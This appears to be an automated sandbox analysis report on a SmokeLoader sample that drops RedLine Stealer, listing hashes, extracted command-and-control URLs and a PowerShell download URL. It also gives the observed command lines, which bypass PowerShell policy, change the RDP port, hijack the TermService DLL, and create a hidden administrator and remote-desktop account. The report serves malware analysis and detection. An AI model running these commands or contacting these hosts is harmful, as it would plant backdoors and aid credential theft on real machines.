Analysis
- max time kernel: 152s
- max time network: 144s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 10-12-2021 08:59

Static task: static1
Behavioral task: behavioral1
- Sample: b03090cd1bd177ae33407bf0660045ed.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: b03090cd1bd177ae33407bf0660045ed.exe
- Resource: win10-en-20211208
General
- Target: b03090cd1bd177ae33407bf0660045ed.exe
- Size: 219KB
- MD5: b03090cd1bd177ae33407bf0660045ed
- SHA1: 2813830526d47eda025534dcf6956b468b340dcd
- SHA256: bfb63daf8e5d09c7a464bfec38d2d5e4737bd3d2c04974616ef46b5ffddcc8f1
- SHA512: b4b107b6edb252369e850c31fb6dd04616236bf3f44298b2e85d09d47f7167d870d625012dfae070f8f10ed6431712aff5c58ff68a0bbcdb2b6a62843e72f037
Malware Config
Extracted
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
- Family: smokeloader
- Version: 2020
- C2:
  - http://rcacademy.at/upload/
  - http://e-lanpengeonline.com/upload/
  - http://vjcmvz.cn/upload/
  - http://galala.ru/upload/
  - http://witra.ru/upload/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2280-122-0x0000000000AA0000-0x0000000000B0C000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes: powershell.exe
flow | pid | process
92 | 2836 | powershell.exe
94 | 2836 | powershell.exe
95 | 2836 | powershell.exe
96 | 2836 | powershell.exe
98 | 2836 | powershell.exe
100 | 2836 | powershell.exe
102 | 2836 | powershell.exe
104 | 2836 | powershell.exe
106 | 2836 | powershell.exe
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes: ADA1.exe, EFAC.exe
pid | process
2280 | ADA1.exe
956 | EFAC.exe
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
Deletes itself 1 IoCs
Processes:
pid | process
3036 | (unnamed)
Loads dropped DLL 2 IoCs
Processes:
pid | process
2488 | (unnamed)
2488 | (unnamed)
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes: ADA1.exe
pid | process
2280 | ADA1.exe
Drops file in Program Files directory 4 IoCs
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
Drops file in Windows directory 19 IoCs
Processes: powershell.exe, powershell.exe
description | ioc | process
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8525.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8584.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_njluuffr.vxz.ps1 | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8594.tmp | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_yob25qff.dyk.psm1 | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85A5.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85A6.tmp | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: b03090cd1bd177ae33407bf0660045ed.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | b03090cd1bd177ae33407bf0660045ed.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | b03090cd1bd177ae33407bf0660045ed.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | b03090cd1bd177ae33407bf0660045ed.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe (every entry below was made by powershell.exe)
description | ioc
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 96 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 98 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 94 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 95 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: b03090cd1bd177ae33407bf0660045ed.exe
pid | process
2652 | b03090cd1bd177ae33407bf0660045ed.exe
2652 | b03090cd1bd177ae33407bf0660045ed.exe
3036 | (unnamed)  (62 entries)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3036 | (unnamed)
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
628 | (unnamed)
628 | (unnamed)
Suspicious behavior: MapViewOfSection 1 IoCs
Processes: b03090cd1bd177ae33407bf0660045ed.exe
pid | process
2652 | b03090cd1bd177ae33407bf0660045ed.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe
description | pid | process
Token: SeShutdownPrivilege | 3036 | (unnamed)
Token: SeCreatePagefilePrivilege | 3036 | (unnamed)
Token: SeShutdownPrivilege | 3036 | (unnamed)
Token: SeCreatePagefilePrivilege | 3036 | (unnamed)
Token: SeDebugPrivilege | 1456 | powershell.exe
Token: SeDebugPrivilege | 3188 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3188 | powershell.exe
Token: SeSecurityPrivilege | 3188 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3188 | powershell.exe
Token: SeLoadDriverPrivilege | 3188 | powershell.exe
Token: SeSystemProfilePrivilege | 3188 | powershell.exe
Token: SeSystemtimePrivilege | 3188 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3188 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3188 | powershell.exe
Token: SeCreatePagefilePrivilege | 3188 | powershell.exe
Token: SeBackupPrivilege | 3188 | powershell.exe
Token: SeRestorePrivilege | 3188 | powershell.exe
Token: SeShutdownPrivilege | 3188 | powershell.exe
Token: SeDebugPrivilege | 3188 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3188 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3188 | powershell.exe
Token: SeUndockPrivilege | 3188 | powershell.exe
Token: SeManageVolumePrivilege | 3188 | powershell.exe
Token: 33 | 3188 | powershell.exe
Token: 34 | 3188 | powershell.exe
Token: 35 | 3188 | powershell.exe
Token: 36 | 3188 | powershell.exe
Token: SeDebugPrivilege | 404 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 404 | powershell.exe
Token: SeSecurityPrivilege | 404 | powershell.exe
Token: SeTakeOwnershipPrivilege | 404 | powershell.exe
Token: SeLoadDriverPrivilege | 404 | powershell.exe
Token: SeSystemProfilePrivilege | 404 | powershell.exe
Token: SeSystemtimePrivilege | 404 | powershell.exe
Token: SeProfSingleProcessPrivilege | 404 | powershell.exe
Token: SeIncBasePriorityPrivilege | 404 | powershell.exe
Token: SeCreatePagefilePrivilege | 404 | powershell.exe
Token: SeBackupPrivilege | 404 | powershell.exe
Token: SeRestorePrivilege | 404 | powershell.exe
Token: SeShutdownPrivilege | 404 | powershell.exe
Token: SeDebugPrivilege | 404 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 404 | powershell.exe
Token: SeRemoteShutdownPrivilege | 404 | powershell.exe
Token: SeUndockPrivilege | 404 | powershell.exe
Token: SeManageVolumePrivilege | 404 | powershell.exe
Token: 33 | 404 | powershell.exe
Token: 34 | 404 | powershell.exe
Token: 35 | 404 | powershell.exe
Token: 36 | 404 | powershell.exe
Token: SeDebugPrivilege | 2776 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2776 | powershell.exe
Token: SeSecurityPrivilege | 2776 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2776 | powershell.exe
Token: SeLoadDriverPrivilege | 2776 | powershell.exe
Token: SeSystemProfilePrivilege | 2776 | powershell.exe
Token: SeSystemtimePrivilege | 2776 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2776 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2776 | powershell.exe
Token: SeCreatePagefilePrivilege | 2776 | powershell.exe
Token: SeBackupPrivilege | 2776 | powershell.exe
Token: SeRestorePrivilege | 2776 | powershell.exe
Token: SeShutdownPrivilege | 2776 | powershell.exe
Token: SeDebugPrivilege | 2776 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2776 | powershell.exe
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid | process
3036 | (unnamed)  (4 entries)
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid | process
3036 | (unnamed)  (2 entries)
Suspicious use of WriteProcessMemory 64 IoCs
Processes: EFAC.exe, powershell.exe, csc.exe, csc.exe, net.exe, cmd.exe, cmd.exe, net.exe, cmd.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe, net.exe, cmd.exe
description | pid | process | target process
PID 3036 wrote to memory of 2280 | 3036 | (unnamed) | ADA1.exe  (3 entries)
PID 3036 wrote to memory of 956 | 3036 | (unnamed) | EFAC.exe  (2 entries)
PID 956 wrote to memory of 1456 | 956 | EFAC.exe | powershell.exe  (2 entries)
PID 1456 wrote to memory of 3404 | 1456 | powershell.exe | csc.exe  (2 entries)
PID 3404 wrote to memory of 2692 | 3404 | csc.exe | cvtres.exe  (2 entries)
PID 1456 wrote to memory of 3456 | 1456 | powershell.exe | csc.exe  (2 entries)
PID 3456 wrote to memory of 732 | 3456 | csc.exe | cvtres.exe  (2 entries)
PID 1456 wrote to memory of 3188 | 1456 | powershell.exe | powershell.exe  (2 entries)
PID 1456 wrote to memory of 404 | 1456 | powershell.exe | powershell.exe  (2 entries)
PID 1456 wrote to memory of 2776 | 1456 | powershell.exe | powershell.exe  (2 entries)
PID 1456 wrote to memory of 3664 | 1456 | powershell.exe | reg.exe  (2 entries)
PID 1456 wrote to memory of 1360 | 1456 | powershell.exe | reg.exe  (2 entries)
PID 1456 wrote to memory of 2164 | 1456 | powershell.exe | reg.exe  (2 entries)
PID 1456 wrote to memory of 2292 | 1456 | powershell.exe | net.exe  (2 entries)
PID 2292 wrote to memory of 3228 | 2292 | net.exe | net1.exe  (2 entries)
PID 1456 wrote to memory of 3352 | 1456 | powershell.exe | cmd.exe  (2 entries)
PID 3352 wrote to memory of 3960 | 3352 | cmd.exe | cmd.exe  (2 entries)
PID 3960 wrote to memory of 680 | 3960 | cmd.exe | net.exe  (2 entries)
PID 680 wrote to memory of 2948 | 680 | net.exe | net1.exe  (2 entries)
PID 1456 wrote to memory of 2432 | 1456 | powershell.exe | cmd.exe  (2 entries)
PID 2432 wrote to memory of 3300 | 2432 | cmd.exe | cmd.exe  (2 entries)
PID 3300 wrote to memory of 3056 | 3300 | cmd.exe | net.exe  (2 entries)
PID 3056 wrote to memory of 1584 | 3056 | net.exe | net1.exe  (2 entries)
PID 3192 wrote to memory of 2840 | 3192 | cmd.exe | net.exe  (2 entries)
PID 2840 wrote to memory of 2652 | 2840 | net.exe | net1.exe  (2 entries)
PID 1460 wrote to memory of 3004 | 1460 | cmd.exe | net.exe  (2 entries)
PID 3004 wrote to memory of 732 | 3004 | net.exe | net1.exe  (2 entries)
PID 3156 wrote to memory of 648 | 3156 | cmd.exe | net.exe  (2 entries)
PID 648 wrote to memory of 856 | 648 | net.exe | net1.exe  (2 entries)
PID 3900 wrote to memory of 1216 | 3900 | cmd.exe | net.exe  (2 entries)
PID 1216 wrote to memory of 2828 | 1216 | net.exe | net1.exe  (2 entries)
PID 304 wrote to memory of 3832 | 304 | cmd.exe | net.exe
Processes
(Indentation shows process depth: each indented entry is a child of the less-indented process above it.)

C:\Users\Admin\AppData\Local\Temp\b03090cd1bd177ae33407bf0660045ed.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\b03090cd1bd177ae33407bf0660045ed.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\ADA1.exe
  command line: C:\Users\Admin\AppData\Local\Temp\ADA1.exe
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Users\Admin\AppData\Local\Temp\EFAC.exe
  command line: C:\Users\Admin\AppData\Local\Temp\EFAC.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o05jx1i\2o05jx1i.cmdline"
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18EE.tmp" "c:\Users\Admin\AppData\Local\Temp\2o05jx1i\CSC4A6977B1B5D4D7CBDA0A64D0F7DFBD.TMP"

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ni0oup1h\ni0oup1h.cmdline"
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES212B.tmp" "c:\Users\Admin\AppData\Local\Temp\ni0oup1h\CSC1261582FA4C645DB821DCB8B67D11D2F.TMP"

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\reg.exe
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

    C:\Windows\system32\reg.exe
      command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key

    C:\Windows\system32\reg.exe
      command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

    C:\Windows\system32\net.exe
      command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

    C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net.exe
          command line: net start rdpdr
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 start rdpdr

    C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net.exe
          command line: net start TermService
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 start TermService

    C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

    C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    command line: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc aKxqZVVk /add
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    command line: net.exe user WgaUtilAcc aKxqZVVk /add
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user WgaUtilAcc aKxqZVVk /add

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    command line: net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
